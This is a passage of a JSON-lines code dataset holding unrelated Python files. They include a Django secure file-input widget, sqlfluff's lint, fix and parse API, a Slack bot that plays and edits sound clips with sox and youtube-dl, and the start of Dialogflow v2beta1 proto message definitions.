ugettext_lazy('Currently')\n\tinput_text = ugettext_lazy('Change')\n\tclear_checkbox_label = ugettext_lazy('Clear')\n\n\ttemplate_with_initial = '%(initial_text)s: %(initial)s %(clear_template)s<br />%(input_text)s: %(input)s'\n\n\ttemplate_with_clear = '%(clear)s <label for=\"%(clear_checkbox_id)s\">%(clear_checkbox_label)s</label>'\n\n\tdef __init__(self, data_source_url, attrs=None):\n\t\tself.data_source_url = data_source_url\n\t\tsuper(SecureFileInput, self).__init__(attrs)\n\n\tdef render(self, name, value, attrs=None):\n\t\tsubstitutions = {\n\t\t\t'initial_text': self.initial_text,\n\t\t\t'input_text': self.input_text,\n\t\t\t'clear_template': '',\n\t\t\t'clear_checkbox_label': self.clear_checkbox_label,\n\t\t}\n\t\ttemplate = '%(input)s'\n\t\tsubstitutions['input'] = super(SecureFileInput, self).render(name, value, attrs)\n\n\t\tif value and hasattr(value, \"url\"):\n\t\t\ttemplate = self.template_with_initial\n\t\t\tsubstitutions['initial'] = format_html('<a href=\"{0}\">{1}</a>',\n\t\t\t\t\t\t\t\t\t\t\t\t force_text(self.data_source_url),\n\t\t\t\t\t\t\t\t\t\t\t\t force_text(os.path.basename(value.name)))\n\t\t\tif not self.is_required:\n\t\t\t\tcheckbox_name = self.clear_checkbox_name(name)\n\t\t\t\tcheckbox_id = self.clear_checkbox_id(checkbox_name)\n\t\t\t\tsubstitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)\n\t\t\t\tsubstitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)\n\t\t\t\tsubstitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})\n\t\t\t\tsubstitutions['clear_template'] = self.template_with_clear % substitutions\n\n\t\treturn mark_safe(template % substitutions)\n\n\n\tdef clear_checkbox_name(self, name):\n\t\t\"\"\"\n\t\tGiven the name of the file input, return the name of the clear checkbox\n\t\tinput.\n\t\t\"\"\"\n\t\treturn name + '-clear'\n\n\tdef clear_checkbox_id(self, name):\n\t\t\"\"\"\n\t\tGiven the name of the clear checkbox input, return the HTML id for it.\n\t\t\"\"\"\n\t\treturn name + '_id'\n\n\tdef value_from_datadict(self, data, files, name):\n\t\tupload = super(SecureFileInput, self).value_from_datadict(data, files, name)\n\t\tif not self.is_required and CheckboxInput().value_from_datadict(\n\t\t\tdata, files, self.clear_checkbox_name(name)):\n\t\t\tif upload:\n\t\t\t\t# If the user contradicts themselves (uploads a new file AND\n\t\t\t\t# checks the \"clear\" checkbox), we return a unique marker\n\t\t\t\t# object that FileField will turn into a ValidationError.\n\t\t\t\treturn FILE_INPUT_CONTRADICTION\n\t\t\t# False signals to clear any existing value, as opposed to just None\n\t\t\treturn False\n\t\treturn upload","sub_path":"assignments/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"316882971","text":"def sum_values(*args):\n total = 0\n for num in args:\n total += num\n return total\n\nnums = [1,2,3,4,5,6]\nprint(sum_values(*nums))\n\n\n\ndef add_mult(a,b,c, **kwargs):\n print(a+b*c)\n print(kwargs)\n\ndata = dict(a=2, b=3, c=4, name=\"tony stark\", age=55)\nadd_mult(**data, cat=\"blue\")","sub_path":"functions/funcs_two/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"179603610","text":"\"\"\"Is our reference hackery usable.\"\"\"\n\nfrom pyiem import reference\n\n\ndef test_reference():\n \"\"\"Can we import everything from our API.\"\"\"\n for name in reference._onthefly_dict:\n res = getattr(reference, name, None)\n # is a dictionary\n assert isinstance(res, dict)\n # has keys\n assert 
res.keys()\n","sub_path":"tests/test_reference.py","file_name":"test_reference.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586813147","text":"\"\"\"The simple public API methods.\"\"\"\n\nfrom sqlfluff.core import Linter\n\n\nclass APIParsingError(ValueError):\n \"\"\"An exception which holds a set of violations.\"\"\"\n\n def __init__(self, violations, **kwargs):\n self.violations = violations\n self.msg = f\"Found {len(violations)} issues while parsing string.\"\n for viol in violations:\n self.msg += f\"\\n{viol!s}\"\n super().__init__(self.msg, **kwargs)\n\n\ndef _unify_str_or_file(sql):\n \"\"\"Unify string and files in the same format.\"\"\"\n if not isinstance(sql, str):\n try:\n sql = sql.read()\n except AttributeError:\n raise TypeError(\"Value passed as sql is not a string or a readable object.\")\n return sql\n\n\ndef lint(sql, dialect=\"ansi\", rules=None):\n \"\"\"Lint a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. Defaults to `ansi`.\n rules (:obj:`str` or iterable of :obj:`str`, optional): A subset of rule\n reference to lint for.\n\n Returns:\n :obj:`list` of :obj:`dict` for each violation found.\n \"\"\"\n sql = _unify_str_or_file(sql)\n linter = Linter(dialect=dialect, rules=rules)\n\n result = linter.lint_string_wrapped(sql)\n result_records = result.as_records()\n # Return just the violations for this file\n return [] if not result_records else result_records[0][\"violations\"]\n\n\ndef fix(sql, dialect=\"ansi\", rules=None):\n \"\"\"Fix a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. Defaults to `ansi`.\n rules (:obj:`str` or iterable of :obj:`str`, optional): A subset of rule\n reference to lint for.\n\n Returns:\n :obj:`str` for the fixed sql if possible.\n \"\"\"\n sql = _unify_str_or_file(sql)\n linter = Linter(dialect=dialect, rules=rules)\n\n result = linter.lint_string_wrapped(sql, fix=True)\n fixed_string = result.paths[0].files[0].fix_string()[0]\n return fixed_string\n\n\ndef parse(sql, dialect=\"ansi\"):\n \"\"\"Parse a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. 
Defaults to `ansi`.\n\n Returns:\n :obj:`ParsedString` containing the parsed structure.\n \"\"\"\n sql = _unify_str_or_file(sql)\n linter = Linter(dialect=dialect)\n parsed = linter.parse_string(sql)\n # If we encounter any parsing errors, raise them in a combined issue.\n if parsed.violations:\n raise APIParsingError(parsed.violations)\n return parsed\n","sub_path":"src/sqlfluff/api/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"55468999","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport time\nimport traceback\nimport subprocess\nimport string\nfrom datetime import datetime\nfrom distutils.util import strtobool\nimport os\nimport re\nimport json\nimport urllib.request, urllib.error, urllib.parse\n\nfrom slack_bolt import App\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\n\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nSOUNDS_DIR = os.path.join(BASE_DIR, 'sounds')\nCONFIG_FILE = os.path.join(BASE_DIR, 'config.json')\nLOGGING_FILE = os.path.join(BASE_DIR, 'commands.log')\nVALID_CHARS = string.ascii_letters + string.digits + \" .'_-\"\nFOLDER_SEP = ':/|'\nPLAYER = 'mpg123'\nFILETYPE = 'mp3'\nEQUALIZER = ['mp3gain', '-r']\nPAD_SILENCE = ['sox', 'in.mp3', 'out.mp3', 'pad', '0.5', '0']\nTRIM = ['sox', 'in.mp3', 'out.mp3', 'trim', 'from', 'to']\nFADE = ['sox', 'in.mp3', 'out.mp3', 'fade', '0', '-0', '2']\nYOUTUBE_DOWNLOAD = ['youtube-dl', '--extract-audio', '--audio-format', 'mp3', 'url', '-o', '{}.%(ext)s']\n\nDEFAULT_OPTIONS = {\n \"_token\": None,\n \"throttling\": True,\n \"throttling_reset\": 10 * 60,\n \"throttling_count\": 5,\n \"default_ban_length\": 30,\n}\n\nPLAY_REGEX = re.compile(\"play\\\\s([a-z0-9_' ]+)\", re.IGNORECASE)\nREMOVE_REGEX = re.compile(\"remove\\\\s([a-z0-9_' ]+)\", re.IGNORECASE)\nUPDATE_CONF_REGEX = re.compile(\"^set\\\\s([A-Z0-9_]+)\\\\sto\\\\s([A-Z0-9_]+)$\", re.IGNORECASE)\nSHOW_CONF_REGEX = re.compile(\"^show\\\\sconf$\", re.IGNORECASE)\nLIST_SOUNDS_REGEX = re.compile(\"list\\\\ssounds\", re.IGNORECASE)\nPUNISH_USER_REGEX = re.compile(\"punish\\\\s+<@(\\\\w+)>\\\\s*(\\\\d+)?\", re.IGNORECASE) # Slack delivers mentions as <@USERID>: group 1 is the user id, group 2 the optional minutes\nHELP_REGEX = re.compile(\"^help$\", re.IGNORECASE)\nSHOW_LOGS_REGEX = re.compile(\"^show\\\\slogs$\", re.IGNORECASE)\nTRIM_REGEX = re.compile(\"^trim\\\\s([a-z0-9_' ]+)\\\\s([\\\\d\\\\.]+)\\\\s([\\\\d\\\\.]+)$\", re.IGNORECASE)\nFADE_OUT_REGEX = re.compile(\"^fade\\\\s([a-z0-9_' ]+)$\", re.IGNORECASE)\nYOUTUBE_REGEX = re.compile(\"^download\\\\s+(\\\\S+)\\\\s+([a-z0-9_' :/|]+)$\", re.IGNORECASE) # group 1 is the source URL, group 2 the sound name (optionally folder:name)\nPAD_REGEX = re.compile(\"^pad\\\\s([a-z0-9_' ]+)$\", re.IGNORECASE)\n\n\nusers = {}\nthrottling_record = {}\npunished = {}\nlogs = []\nconfig = {}\nwith open(CONFIG_FILE, 'r') as f:\n config = json.loads(f.read())\nfor key, value in DEFAULT_OPTIONS.items():\n config.setdefault(key, value)\napp = App(token=config[\"oauth_token\"])\n\n\ndef write_config(config):\n with open(CONFIG_FILE, 'w') as f:\n f.write(json.dumps(config))\n\n\ndef find_sound(sound_name):\n directories = (file_ for file_ in os.listdir(SOUNDS_DIR)\n if os.path.isdir(os.path.join(SOUNDS_DIR, file_)))\n for d in directories:\n path = os.path.join(SOUNDS_DIR, d, '{}.{}'.format(sound_name.replace(' ', '_'), FILETYPE))\n if os.path.isfile(path):\n return path\n\n\ndef play_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n\n def throttle():\n if not config[\"throttling\"] or user[\"is_admin\"]:\n return False, None\n record = 
throttling_record.get(user[\"name\"], {\"time\": time.time(), \"count\": 0})\n if (time.time() - record[\"time\"]) < config[\"throttling_reset\"]:\n record[\"count\"] += 1\n else:\n record[\"count\"] = 1\n record[\"time\"] = time.time()\n throttling_record[user[\"name\"]] = record\n return record[\"count\"] > config[\"throttling_count\"], record\n\n def check_punished():\n if user[\"is_admin\"]:\n return False\n release = punished.get(user[\"name\"], time.time())\n if release > time.time():\n return release\n return False\n\n if sound_file:\n throttled, record = throttle()\n punished_release = check_punished()\n if throttled:\n message = 'You reached your throttling limit. Try again later.'\n elif punished_release:\n message = 'You have been punished ! No sounds until {}.'.format(datetime.fromtimestamp(punished_release).strftime('%H:%M:%S'))\n else:\n logs.append((user, sound_name, time.time()))\n message = 'Playing ' + sound_name\n subprocess.Popen([PLAYER, \"{}\".format(sound_file)])\n if record:\n message += '\\n {} plays left. Reset at {}.'.format(\n max(config[\"throttling_count\"] - record[\"count\"], 0),\n datetime.fromtimestamp(record[\"time\"] + config[\"throttling_reset\"]).strftime('%H:%M:%S')\n )\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef remove_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n os.remove(sound_file)\n message = 'Removed ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef show_logs_action(match, user, config):\n return '\\n'.join(['{} played {} at {}'.format(l[0]['name'], l[1], datetime.fromtimestamp(l[2]).strftime('%H:%M:%S'))\n for l in logs[-10:]])\n\n\ndef list_sounds_action(match, user, config):\n message = '```\\nAvailable sounds are :\\n'\n directories = sorted(file_ for file_ in os.listdir(SOUNDS_DIR)\n if os.path.isdir(os.path.join(SOUNDS_DIR, file_)))\n\n def split_by_cols(l, n=4):\n output = ''\n for row in (l[i:i + n] for i in range(0, len(l), n)):\n fmt = \"| {:<30s} \" * len(row)\n output += fmt.format(*row) + '\\n'\n return output\n\n for directory in directories:\n message += '\\n' + directory.upper() + ':\\n'\n sounds = sorted(s.split('.')[0].replace('_', ' ') for s in os.listdir(os.path.join(SOUNDS_DIR, directory)))\n message += split_by_cols(sounds)\n\n message += '```'\n return message\n\n\ndef show_conf_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n message = ''\n for key, value in config.items():\n message += '{}: {}\\n'.format(key, value)\n return message\n\n\ndef show_help_action(match, user, config):\n message = \"\"\"\nWelcome to sounds, the bot that brings fun to your team.\nTo interact with the bot, simply use these commands:\n list sounds: shows the full list of all the sounds available\n play replace_with_sound: plays the sound you chose from the list\n show logs: shows a list who played the last 10 sounds\n pad replace_with_sound: adds 0.5s at the beginning of the sound\n trim replace_with_sound 2.5 10: trim the selected sound to be only between 2.5 and 10 seconds\n fade replace_with_sound: adds a 1s fadeout on your sound\n download replace_with_youtube_url replace_with_sound: downloads a sound from youtube\n help: shows this help\"\"\"\n if user[\"is_admin\"]:\n message += \"\"\"\n remove sound_name: removes the sound from the list\n show conf: show the config variables\n set x to y: updates the x config variable with y 
value\n punish @user 30: prevent user from playing a sound for 30 minutes\"\"\"\n message += \"\"\"\nHow to upload a sound?\nIn the bot channel, upload your mp3 file. This file should already be cut properly and have 0.5s of silence at the beginning.\nYou can use various websites like sonyoutube.com to convert a youtube video to an mp3 file and then use software like Audacity or a website like audiotrimmer.com to edit it.\nBe sure your filename ends with .mp3 and if you want to put your file in a specific folder separate the folder from the filename like so folder:filename.mp3\n\nThat's it with the instructions, have fun!\"\"\"\n return message\n\n\ndef update_conf_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n key = match.group(1)\n value = match.group(2)\n if key.startswith('_'):\n return \"Can't set private variables\"\n try:\n value = int(value)\n except ValueError:\n try:\n value = bool(strtobool(value))\n except ValueError:\n pass\n config[key] = value\n write_config(config)\n return \"Config set\"\n\n\ndef punish_user_action(match, user, config):\n if not user[\"is_admin\"]:\n return\n who = match.group(1)\n r = users.get(who)\n if r:\n who = r\n else:\n return \"Couldn't find user {}\".format(who)\n try:\n how_long = int(match.group(2) or config.get('default_ban_length'))\n except ValueError:\n how_long = 30\n punished[who[\"name\"]] = time.time() + how_long * 60\n return \"{} has been punished for {} minutes.\".format(who[\"name\"], how_long)\n\n\ndef trim_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n trim_command = list(TRIM)\n trim_command[1] = sound_file\n trim_command[2] = tmp_file\n trim_command[4] = match.group(2)\n trim_command[5] = '=' + match.group(3)\n process = subprocess.Popen(trim_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Trimmed ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef pad_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n pad_command = list(PAD_SILENCE)\n pad_command[1] = sound_file\n pad_command[2] = tmp_file\n process = subprocess.Popen(pad_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Padded ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef fade_out_action(match, user, config):\n sound_name = match.group(1).strip()\n sound_file = find_sound(sound_name)\n if sound_file:\n tmp_file = '__NEW__' + os.path.basename(sound_file)\n fade_command = list(FADE)\n fade_command[1] = sound_file\n fade_command[2] = tmp_file\n process = subprocess.Popen(fade_command)\n process.wait()\n os.rename(tmp_file, sound_file)\n message = 'Faded ' + sound_name\n else:\n message = 'No sound matching ' + sound_name\n return message\n\n\ndef slugify(raw):\n return \"\".join([x for x in raw if x in VALID_CHARS]).replace(\"-\", \"_\").strip().replace(\" \", \"_\").lower()\n\n\ndef download_action(match, user, config):\n url = match.group(1)\n filename = match.group(2)\n folder = 'misc'\n for sep in FOLDER_SEP:\n if sep in filename:\n folder, filename = filename.split(sep)\n break\n if filename.endswith('.mp3'):\n filename = filename[:-4]\n filename = slugify(filename)\n\n dl_command = list(YOUTUBE_DOWNLOAD)\n dl_command[-1] = dl_command[-1].format(filename)\n 
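# index -1 of YOUTUBE_DOWNLOAD is the output template '{}.%(ext)s' (formatted above); index -3 is the literal 'url' placeholder, swapped for the real link next.\n 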
dl_command[-3] = url\n process = subprocess.Popen(dl_command)\n process.wait()\n\n path_to_sound = os.path.join(SOUNDS_DIR, slugify(folder), filename + '.mp3')\n try:\n os.makedirs(os.path.join(SOUNDS_DIR, slugify(folder)))\n except OSError:\n pass\n os.rename(filename + '.mp3', path_to_sound)\n subprocess.Popen(EQUALIZER + [path_to_sound])\n return \"Sound added correctly\"\n\n\ndef add_sound(sc, file_id, config):\n info = sc.files_info(file=file_id)\n file_url = info.get(\"file\").get(\"url_private\") if info[\"ok\"] else ''\n filename = info.get(\"file\").get(\"title\") if info[\"ok\"] else ''\n if filename.endswith('.mp3') and file_url.endswith('.mp3'):\n folder = 'misc'\n for sep in FOLDER_SEP:\n if sep in filename:\n folder, filename = filename.split(sep)\n break\n try:\n os.makedirs(os.path.join(SOUNDS_DIR, slugify(folder)))\n except OSError:\n pass\n req = urllib.request.Request(file_url, headers={\"Authorization\": \"Bearer \" + config[\"oauth_token\"]}) # reuse the bot token that authenticated the App\n path_to_sound = os.path.join(SOUNDS_DIR, slugify(folder), slugify(filename))\n with open(path_to_sound, 'wb') as f: # urlopen().read() returns bytes, so write in binary mode\n f.write(urllib.request.urlopen(req).read())\n subprocess.Popen(EQUALIZER + [path_to_sound])\n\n\nACTIONS = {\n PLAY_REGEX: play_action,\n REMOVE_REGEX: remove_action,\n UPDATE_CONF_REGEX: update_conf_action,\n SHOW_CONF_REGEX: show_conf_action,\n PUNISH_USER_REGEX: punish_user_action,\n HELP_REGEX: show_help_action,\n LIST_SOUNDS_REGEX: list_sounds_action,\n SHOW_LOGS_REGEX: show_logs_action,\n YOUTUBE_REGEX: download_action,\n PAD_REGEX: pad_action,\n TRIM_REGEX: trim_action,\n FADE_OUT_REGEX: fade_out_action,\n}\n\n\ndef load_users(sc):\n user_list = []\n\n def paginated_api_call(cursor=None):\n response = sc.users_list(cursor=cursor)\n user_list.extend(response.get(\"members\", []))\n if response.get(\"response_metadata\", {}).get(\"next_cursor\"):\n paginated_api_call(response[\"response_metadata\"][\"next_cursor\"])\n\n paginated_api_call()\n for user in user_list:\n users[user[\"id\"]] = {\n \"name\": user[\"name\"],\n \"is_admin\": user.get(\"is_admin\", False) or user[\"id\"] in config.get(\"admins\", []),\n \"id\": user[\"id\"]\n }\n\n@app.event(\"file_created\")\n@app.event(\"file_shared\")\ndef file_uploaded(event, **kwargs):\n file_id = event.get('file', {}).get('id', None)\n if file_id:\n add_sound(app._client, file_id, config)\n\n\n@app.event(\"message\")\ndef message_received(event, **kwargs):\n text = event.get('text', '').replace('’', \"'\")\n user = users.get(event.get('user', None), None)\n channel = event.get('channel', None)\n if not user or not text or not channel:\n return\n\n message = None\n for regex, action in ACTIONS.items():\n match = regex.match(text)\n if match:\n message = action(match, user, config)\n if message:\n app._client.chat_postEphemeral(channel=channel, text=message, user=user[\"id\"])\n break\n\n\ndef start():\n handler = SocketModeHandler(app, config[\"app_token\"])\n load_users(app._client)\n bot_id = app._client.auth_test()[\"user_id\"]\n handler.start()\n\n\n\nif __name__ == '__main__':\n while True:\n try:\n start()\n except Exception:\n traceback.print_exc()\n time.sleep(30)","sub_path":"sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"48862321","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the 
License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport proto # type: ignore\n\nfrom google.cloud.dialogflow_v2beta1.types import audio_config\nfrom google.cloud.dialogflow_v2beta1.types import session\nfrom google.protobuf import field_mask_pb2 # type: ignore\nfrom google.protobuf import struct_pb2 # type: ignore\nfrom google.protobuf import timestamp_pb2 # type: ignore\nfrom google.rpc import status_pb2 # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.cloud.dialogflow.v2beta1\",\n manifest={\n \"Participant\",\n \"Message\",\n \"CreateParticipantRequest\",\n \"GetParticipantRequest\",\n \"ListParticipantsRequest\",\n \"ListParticipantsResponse\",\n \"UpdateParticipantRequest\",\n \"OutputAudio\",\n \"AutomatedAgentReply\",\n \"SuggestionFeature\",\n \"AnalyzeContentRequest\",\n \"DtmfParameters\",\n \"AnalyzeContentResponse\",\n \"AnnotatedMessagePart\",\n \"MessageAnnotation\",\n \"ArticleAnswer\",\n \"FaqAnswer\",\n \"SmartReplyAnswer\",\n \"SuggestionResult\",\n \"SuggestArticlesRequest\",\n \"SuggestArticlesResponse\",\n \"SuggestFaqAnswersRequest\",\n \"SuggestFaqAnswersResponse\",\n \"SuggestSmartRepliesRequest\",\n \"SuggestSmartRepliesResponse\",\n \"Suggestion\",\n \"ListSuggestionsRequest\",\n \"ListSuggestionsResponse\",\n \"CompileSuggestionRequest\",\n \"CompileSuggestionResponse\",\n \"ResponseMessage\",\n },\n)\n\n\nclass Participant(proto.Message):\n r\"\"\"Represents a conversation participant (human agent, virtual\n agent, end-user).\n\n Attributes:\n name (str):\n Optional. The unique identifier of this participant. Format:\n ``projects//locations//conversations//participants/``.\n role (google.cloud.dialogflow_v2beta1.types.Participant.Role):\n Immutable. The role this participant plays in\n the conversation. This field must be set during\n participant creation and is then immutable.\n obfuscated_external_user_id (str):\n Optional. Obfuscated user id that should be associated with\n the created participant.\n\n You can specify a user id as follows:\n\n 1. If you set this field in\n [CreateParticipantRequest][google.cloud.dialogflow.v2beta1.CreateParticipantRequest.participant]\n or\n [UpdateParticipantRequest][google.cloud.dialogflow.v2beta1.UpdateParticipantRequest.participant],\n Dialogflow adds the obfuscated user id with the\n participant.\n\n 2. If you set this field in\n [AnalyzeContent][google.cloud.dialogflow.v2beta1.AnalyzeContentRequest.obfuscated_external_user_id]\n or\n [StreamingAnalyzeContent][google.cloud.dialogflow.v2beta1.StreamingAnalyzeContentRequest.obfuscated_external_user_id],\n Dialogflow will update\n [Participant.obfuscated_external_user_id][google.cloud.dialogflow.v2beta1.Participant.obfuscated_external_user_id].\n\n Dialogflow uses this user id for following purposes:\n\n 1) Billing and measurement. If user with the same\n obfuscated_external_user_id is created in a later\n conversation, dialogflow will know it's the same user. 2)\n Agent assist suggestion personalization. For example,\n Dialogflow can use it to provide personalized smart reply\n suggestions for this user.\n\n Note:\n\n - Please never pass raw user ids to Dialogflow. 
Always\n obfuscate your user id first.\n - Dialogflow only accepts a UTF-8 encoded string, e.g., a\n hex digest of a hash function like SHA-512.\n - The length of the user id must be <= 256 characters.\n \"\"\"\n\n class Role(proto.Enum):\n r\"\"\"Enumeration of the roles a participant can play in a\n conversation.\n \"\"\"\n ROLE_UNSPECIFIED = 0\n HUMAN_AGENT = 1\n AUTOMATED_AGENT = 2\n END_USER = 3\n\n name = proto.Field(proto.STRING, number=1,)\n role = proto.Field(proto.ENUM, number=2, enum=Role,)\n obfuscated_external_user_id = proto.Field(proto.STRING, number=7,)\n\n\nclass Message(proto.Message):\n r\"\"\"Represents a message posted into a conversation.\n Attributes:\n name (str):\n Optional. The unique identifier of the message. Format:\n ``projects//locations//conversations//messages/``.\n content (str):\n Required. The message content.\n language_code (str):\n Optional. The message language. This should be a\n `BCP-47 `__\n language tag. Example: \"en-US\".\n participant (str):\n Output only. The participant that sends this\n message.\n participant_role (google.cloud.dialogflow_v2beta1.types.Participant.Role):\n Output only. The role of the participant.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The time when the message was\n created in Contact Center AI.\n send_time (google.protobuf.timestamp_pb2.Timestamp):\n Optional. The time when the message was sent.\n message_annotation (google.cloud.dialogflow_v2beta1.types.MessageAnnotation):\n Output only. The annotation for the message.\n sentiment_analysis (google.cloud.dialogflow_v2beta1.types.SentimentAnalysisResult):\n Output only. The sentiment analysis result\n for the message.\n \"\"\"\n\n name = proto.Field(proto.STRING, number=1,)\n content = proto.Field(proto.STRING, number=2,)\n language_code = proto.Field(proto.STRING, number=3,)\n participant = proto.Field(proto.STRING, number=4,)\n participant_role = proto.Field(proto.ENUM, number=5, enum=\"Participant.Role\",)\n create_time = proto.Field(proto.MESSAGE, number=6, message=timestamp_pb2.Timestamp,)\n send_time = proto.Field(proto.MESSAGE, number=9, message=timestamp_pb2.Timestamp,)\n message_annotation = proto.Field(\n proto.MESSAGE, number=7, message=\"MessageAnnotation\",\n )\n sentiment_analysis = proto.Field(\n proto.MESSAGE, number=8, message=session.SentimentAnalysisResult,\n )\n\n\nclass CreateParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.CreateParticipant][google.cloud.dialogflow.v2beta1.Participants.CreateParticipant].\n\n Attributes:\n parent (str):\n Required. Resource identifier of the conversation adding the\n participant. Format:\n ``projects//locations//conversations/``.\n participant (google.cloud.dialogflow_v2beta1.types.Participant):\n Required. The participant to create.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n participant = proto.Field(proto.MESSAGE, number=2, message=\"Participant\",)\n\n\nclass GetParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.GetParticipant][google.cloud.dialogflow.v2beta1.Participants.GetParticipant].\n\n Attributes:\n name (str):\n Required. The name of the participant. 
Format:\n ``projects//locations//conversations//participants/``.\n \"\"\"\n\n name = proto.Field(proto.STRING, number=1,)\n\n\nclass ListParticipantsRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.ListParticipants][google.cloud.dialogflow.v2beta1.Participants.ListParticipants].\n\n Attributes:\n parent (str):\n Required. The conversation to list all participants from.\n Format:\n ``projects//locations//conversations/``.\n page_size (int):\n Optional. The maximum number of items to\n return in a single page. By default 100 and at\n most 1000.\n page_token (str):\n Optional. The next_page_token value returned from a previous\n list request.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n page_size = proto.Field(proto.INT32, number=2,)\n page_token = proto.Field(proto.STRING, number=3,)\n\n\nclass ListParticipantsResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.ListParticipants][google.cloud.dialogflow.v2beta1.Participants.ListParticipants].\n\n Attributes:\n participants (Sequence[google.cloud.dialogflow_v2beta1.types.Participant]):\n The list of participants. There is a maximum number of items\n returned based on the page_size field in the request.\n next_page_token (str):\n Token to retrieve the next page of results or\n empty if there are no more results in the list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n participants = proto.RepeatedField(proto.MESSAGE, number=1, message=\"Participant\",)\n next_page_token = proto.Field(proto.STRING, number=2,)\n\n\nclass UpdateParticipantRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.UpdateParticipant][google.cloud.dialogflow.v2beta1.Participants.UpdateParticipant].\n\n Attributes:\n participant (google.cloud.dialogflow_v2beta1.types.Participant):\n Required. The participant to update.\n update_mask (google.protobuf.field_mask_pb2.FieldMask):\n Required. The mask to specify which fields to\n update.\n \"\"\"\n\n participant = proto.Field(proto.MESSAGE, number=1, message=\"Participant\",)\n update_mask = proto.Field(\n proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,\n )\n\n\nclass OutputAudio(proto.Message):\n r\"\"\"Represents the natural language speech audio to be played to\n the end user.\n\n Attributes:\n config (google.cloud.dialogflow_v2beta1.types.OutputAudioConfig):\n Required. Instructs the speech synthesizer\n how to generate the speech audio.\n audio (bytes):\n Required. 
The natural language speech audio.\n \"\"\"\n\n config = proto.Field(\n proto.MESSAGE, number=1, message=audio_config.OutputAudioConfig,\n )\n audio = proto.Field(proto.BYTES, number=2,)\n\n\nclass AutomatedAgentReply(proto.Message):\n r\"\"\"Represents a response from an automated agent.\n Attributes:\n detect_intent_response (google.cloud.dialogflow_v2beta1.types.DetectIntentResponse):\n Response of the Dialogflow\n [Sessions.DetectIntent][google.cloud.dialogflow.v2beta1.Sessions.DetectIntent]\n call.\n response_messages (Sequence[google.cloud.dialogflow_v2beta1.types.ResponseMessage]):\n Response messages from the automated agent.\n intent (str):\n Name of the intent if an intent is matched for the query.\n For a V2 query, the value format is\n ``projects//locations/ /agent/intents/``.\n For a V3 query, the value format is\n ``projects//locations/ /agents//intents/``.\n event (str):\n Event name if an event is triggered for the\n query.\n cx_session_parameters (google.protobuf.struct_pb2.Struct):\n The collection of current Dialogflow CX agent\n session parameters at the time of this response.\n \"\"\"\n\n detect_intent_response = proto.Field(\n proto.MESSAGE, number=1, oneof=\"response\", message=session.DetectIntentResponse,\n )\n response_messages = proto.RepeatedField(\n proto.MESSAGE, number=3, message=\"ResponseMessage\",\n )\n intent = proto.Field(proto.STRING, number=4, oneof=\"match\",)\n event = proto.Field(proto.STRING, number=5, oneof=\"match\",)\n cx_session_parameters = proto.Field(\n proto.MESSAGE, number=6, 